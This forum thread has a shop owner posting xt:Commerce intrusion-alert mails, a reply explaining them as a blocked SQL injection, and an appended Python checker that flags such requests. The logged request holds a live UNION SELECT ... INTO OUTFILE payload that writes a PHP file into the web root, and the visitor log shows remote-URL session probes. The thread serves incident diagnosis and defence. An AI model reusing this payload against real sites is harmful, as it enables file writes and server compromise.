xt:Commerce Community Forum

What is this: Attempted hack on your site? (type: Intrusion detection.)


melinda*at


Hello,

My shop is now offline. :mad:

Yesterday evening 160 mails arrived, then today when I switched on my PC roughly 280 more "Attempted hack on your site? (type: Intrusion detection.)" mails came in... both times we immediately took the shop offline.

Mail content:

Attention site admin of Melinda Silbermode,

On DATE_FORMAT_LONG at DATE_TIME_FORMAT_SHORT the xt:C System has detected that somebody tried to send information to your site that may have been intended as a hack. Do not panic, it may be harmless: maybe this detection was triggered by something you did! Anyway, it was detected and blocked.

The suspicious activity was recognized in /homepages/46/d132898374/htdocs/silber/inc/xtc_Security.inc.php on line 68, and is of the type xt:C Security Alert. Additional information given by the code which detected this: Intrusion detection.

Below you will find a lot of information obtained about this attempt, that may help you to find what happened and maybe who did it.

=====================================
Information about this user:
=====================================
This person is not logged in.
IP numbers: [note: when you are dealing with a real cracker these IP numbers might not be from the actual computer he is working on]
IP according to HTTP_CLIENT_IP:
IP according to REMOTE_ADDR: 80.64.198.5
IP according to GetHostByName(80.64.198.5): 80.64.198.5

=====================================
Information in the $_REQUEST array
=====================================
REQUEST * cPath : 29 union select null,null,null,\'just_a_test_4_ \' into outfile \'/homepages/46/d132898374/htdocs/silber/includes/classes/Smarty_2.6.6/jatest.php\'
REQUEST * XTCsid : b653f6158df212286fd33472bd461f19

=====================================
Information in the $_GET array
This is about variables that may have been in the URL string or in a 'GET' type form.
=====================================
GET * cPath : 29 union select null,null,null,\'just_a_test_4_ \' into outfile \'/homepages/46/d132898374/htdocs/silber/includes/classes/Smarty_2.6.6/jatest.php\'
GET * XTCsid : b653f6158df212286fd33472bd461f19

=====================================
Information in the $_POST array
This is about visible and invisible form elements.
=====================================

=====================================
Browser information
=====================================
HTTP_USER_AGENT: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
BROWSER * browser_name_regex : ^mozilla/4\.0 (compatible; msie 7\.0.*;.*windows nt 5\.1.*\.net clr 1.*).*$
BROWSER * browser_name_pattern : Mozilla/4.0 (compatible; MSIE 7.0*;*Windows NT 5.1*.NET CLR 1*)*
BROWSER * parent : IE 7.0
BROWSER * platform : WinXP
BROWSER * netclr : 1
BROWSER * browser : IE
BROWSER * version : 7.0
BROWSER * majorver : 7
BROWSER * minorver : 0
BROWSER * css : 2
BROWSER * frames : 1
BROWSER * iframes : 1
BROWSER * tables : 1
BROWSER * cookies : 1
BROWSER * backgroundsounds : 1
BROWSER * vbscript : 1
BROWSER * javascript : 1
BROWSER * javaapplets : 1
BROWSER * activexcontrols : 1
BROWSER * cdf : 1
BROWSER * aol :
BROWSER * beta : 1
BROWSER * win16 :
BROWSER * crawler :
BROWSER * stripper :
BROWSER * wap :
BROWSER * ismobiledevice :
BROWSER * ak :
BROWSER * sk :

=====================================
Information in the $_SERVER array
=====================================
SERVER * DBENTRY : /kunden/homepages/46/d132898374/htdocs:d0000#CPU 6 #MEM 10240 #CGI 278 #NPROC 12 #TAID 38554849 #WERB 0 #LANG 0 #PARKING 1 #STAT 1
SERVER * DOCUMENT_ROOT : /kunden/homepages/46/d132898374/htdocs
SERVER * HTTP_ACCEPT : image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
SERVER * HTTP_ACCEPT_LANGUAGE : en-us
SERVER * HTTP_CONNECTION : Close
SERVER * HTTP_HOST : www.melinda.at
SERVER * HTTP_UA_CPU : x86
SERVER * HTTP_USER_AGENT : Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
SERVER * PATH : /bin:/usr/bin
SERVER * REDIRECT_DBENTRY : /kunden/homepages/46/d132898374/htdocs:d0000#CPU 6 #MEM 10240 #CGI 278 #NPROC 12 #TAID 38554849 #WERB 0 #LANG 0 #PARKING 1 #STAT 1
SERVER * REDIRECT_QUERY_STRING : cPath=29%20union%20select%20null%2Cnull%2Cnull%2C%27just_a_test_4_%20%3C%3Fphp%20echo%28md5%28%22just_a_test%22%29%29%3B%20echo%28%40unlink%28%22%2Fhomepages%2F46%2Fd132898374%2Fhtdocs%2Fsilber%2Fincludes%2Fclasses%2FSmarty_2.6.6%2Fjatest.php%22%29%20%3F%20%22un%22.%22linked%22%20%3A%20%22not_un%22.%22linked%22%29%20%3F%3E%27%20into%20outfile%20%27%2Fhomepages%2F46%2Fd132898374%2Fhtdocs%2Fsilber%2Fincludes%2Fclasses%2FSmarty_2.6.6%2Fjatest.php%27&XTCsid=b653f6158df212286fd33472bd461f19
SERVER * REDIRECT_SCRIPT_URI : http://www.melinda.at/silber/index.php
SERVER * REDIRECT_SCRIPT_URL : /silber/index.php
SERVER * REDIRECT_STATUS : 200
SERVER * REDIRECT_UNIQUE_ID : SFgAXNTjd6gAAHvjDFs
SERVER * REDIRECT_URL : /silber/index.php
SERVER * REMOTE_ADDR : 80.64.198.5
SERVER * REMOTE_PORT : 40815
SERVER * SCRIPT_FILENAME : /kunden/homepages/46/d132898374/htdocs/silber/index.php
SERVER * SCRIPT_URI : http://www.melinda.at/silber/index.php
SERVER * SCRIPT_URL : /silber/index.php
SERVER * SERVER_ADDR : 82.165.87.12
SERVER * SERVER_ADMIN : [email protected]
SERVER * SERVER_NAME : melinda.at
SERVER * SERVER_PORT : 80
SERVER * SERVER_SIGNATURE :
SERVER * SERVER_SOFTWARE : Apache/1.3.34 Ben-SSL/1.55
SERVER * UNIQUE_ID : SFgAXNTjd6gAAHvjDFs
SERVER * GATEWAY_INTERFACE : CGI/1.1
SERVER * SERVER_PROTOCOL : HTTP/1.0
SERVER * REQUEST_METHOD : GET
SERVER * QUERY_STRING : cPath=29%20union%20select%20null%2Cnull%2Cnull%2C%27just_a_test_4_%20%3C%3Fphp%20echo%28md5%28%22just_a_test%22%29%29%3B%20echo%28%40unlink%28%22%2Fhomepages%2F46%2Fd132898374%2Fhtdocs%2Fsilber%2Fincludes%2Fclasses%2FSmarty_2.6.6%2Fjatest.php%22%29%20%3F%20%22un%22.%22linked%22%20%3A%20%22not_un%22.%22linked%22%29%20%3F%3E%27%20into%20outfile%20%27%2Fhomepages%2F46%2Fd132898374%2Fhtdocs%2Fsilber%2Fincludes%2Fclasses%2FSmarty_2.6.6%2Fjatest.php%27&XTCsid=b653f6158df212286fd33472bd461f19
SERVER * REQUEST_URI : /silber/index.php?cPath=29%20union%20select%20null%2Cnull%2Cnull%2C%27just_a_test_4_%20%3C%3Fphp%20echo%28md5%28%22just_a_test%22%29%29%3B%20echo%28%40unlink%28%22%2Fhomepages%2F46%2Fd132898374%2Fhtdocs%2Fsilber%2Fincludes%2Fclasses%2FSmarty_2.6.6%2Fjatest.php%22%29%20%3F%20%22un%22.%22linked%22%20%3A%20%22not_un%22.%22linked%22%29%20%3F%3E%27%20into%20outfile%20%27%2Fhomepages%2F46%2Fd132898374%2Fhtdocs%2Fsilber%2Fincludes%2Fclasses%2FSmarty_2.6.6%2Fjatest.php%27&XTCsid=b653f6158df212286fd33472bd461f19
SERVER * SCRIPT_NAME : /silber/index.php
SERVER * PATH_INFO : /silber/index.php
SERVER * PATH_TRANSLATED : /kunden/homepages/46/d132898374/htdocs/silber/index.php
SERVER * STATUS : 200
SERVER * PHP_SELF : /silber/index.php
SERVER * argv : Array
SERVER * argc : 1

=====================================
Information in the $_COOKIE array
=====================================

=====================================
Information in the $_FILES array
=====================================

=====================================
Information in the $_SESSION array
This is session info.
=====================================

According to the shop, these visitors were online at the time:

Online    ID  Name   IP address     Start time  Last click  Last URL
00:06:54  0   Guest  80.64.198.5    20:19:27    20:19:27    /silber/shop_content.php?coID=2&XTCsid=http%3A%2F%2Fwww.qubestun
00:06:55  0   Guest  80.64.198.5    20:19:26    20:19:26    /silber/shop_content.php?coID=2&XTCsid=http%3A%2F%2Fwww.clubnata
00:06:55  0   Guest  80.64.198.5    20:19:26    20:19:26    /silber/shop_content.php?coID=2&XTCsid=http%3A%2F%2Frabotnitsa.r
00:07:00  0   Guest  80.64.198.5    20:19:21    20:21:41    /silber/product_info.php?cPath=29&products_id=134&
00:06:45  0   Guest  88.117.54.115  20:19:36    20:19:51    /silber/product_info.php?products_id=103&cPath=30
00:04:45  0   Guest  80.64.198.5    20:21:36    20:21:44    /silber/create_guest_account.php?

and of course I was online too...

I would be very grateful for any help...

Kind regards to all! :D


5 months later...

Hello Melinda,

apparently your problem has resolved itself in the sense that you no longer use an xt:Commerce shop at all (or at least one that has been very extensively rebuilt...) ;)

Just as an explanation, in case other people (like me) happen to stumble across this thread:

The mails were sent by the shop's internal "bouncer", which prevents many break-in attempts on the shop and then informs the admin by mail.

In your case somebody really did try, via a crafted URL and without authorisation, to read contents out of the database and write them into a file that does not belong to the installation (includes/classes/Smarty_2.6.6/jatest.php - perhaps there had already been a break-in earlier and this file was planted then).

How do I know that? From the info in the so-called GET array:

[CODE]union select null,null,null,\'just_a_test_4_ \' into outfile \'/homepages/xx/xxxxxx/htdocs/silber/includes/classes/Smarty_2.6.6/jatest.php\'[/CODE]

That is a database query injected from outside - this is called SQL injection. If it works, the evil cracker can do anything he likes with your database. If you receive the mail above, it did not work :cool:

Since you received 160 mails, it was probably a nasty bot that ran into a wall 160 times. So [i]for now[/i] you got lucky... Which is not to say that this mechanism offers 100% protection!

Cheers,

IaN

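As an added example that is not part of the original thread (and not xt:Commerce's own code), here is a small Python checker that applies the same idea as the shop's "bouncer" to the REQUEST_URI values the alert mails report: it whitelists the expected cPath format and counts blocked requests per source IP, so a burst like the 160 mails above collapses into one line per bot. It assumes an xt:Commerce category path is digits joined by underscores (e.g. 29 or 29_31); the sample URIs and IPs are constructed.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Assumption: an xt:Commerce category path is digits joined by "_", e.g. "29" or "29_31".
CPATH_RE = re.compile(r"^\d+(?:_\d+)*$")
# Keywords that never belong in a category path (matched case-insensitively).
SQL_MARKERS = re.compile(r"\b(union|select|into\s+outfile|load_file)\b", re.IGNORECASE)


def classify_request(request_uri):
    """Return ("ok"|"block", reason) for one REQUEST_URI as reported in an alert mail."""
    query = urlsplit(request_uri).query
    params = dict(parse_qsl(query, keep_blank_values=True))  # decodes %20, %27, ...
    cpath = params.get("cPath")
    if cpath is None:
        return ("ok", "no cPath parameter")
    # Whitelist first: anything that is not a well-formed path is rejected,
    # whether or not one of the known SQL keywords is present.
    if CPATH_RE.match(cpath):
        return ("ok", "cPath well-formed")
    hit = SQL_MARKERS.search(cpath)
    if hit:
        return ("block", "sql keyword in cPath: " + hit.group(1).lower())
    return ("block", "cPath malformed")


def blocked_per_ip(alerts):
    """alerts: (REMOTE_ADDR, REQUEST_URI) pairs; returns {ip: blocked request count}."""
    hits = Counter()
    for ip, uri in alerts:
        if classify_request(uri)[0] == "block":
            hits[ip] += 1
    return dict(hits)   # 160 mails from one bot collapse into one entry with count 160


# Constructed sample alerts: placeholder IPs and a shortened probe, not real traffic.
SAMPLE_ALERTS = [
    ("192.0.2.10", "/silber/index.php?cPath=29&products_id=134&XTCsid=abc"),
    ("192.0.2.10", "/silber/index.php?cPath=29%20union%20select%20null%2Cnull%2Cnull%2C"
                   "%27x%27%20into%20outfile%20%27%2Ftmp%2Fx.php%27&XTCsid=abc"),
    ("192.0.2.10", "/silber/index.php?cPath=29%27&XTCsid=abc"),
    ("192.0.2.20", "/silber/product_info.php?products_id=103&cPath=30_31"),
]

if __name__ == "__main__":
    for ip, uri in SAMPLE_ALERTS:
        print(ip, classify_request(uri))
    print(blocked_per_ip(SAMPLE_ALERTS))   # {'192.0.2.10': 2}
```

The whitelist check is what matters: a keyword list alone would miss the third sample (a stray quote), while the format check rejects it without needing to know the payload.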
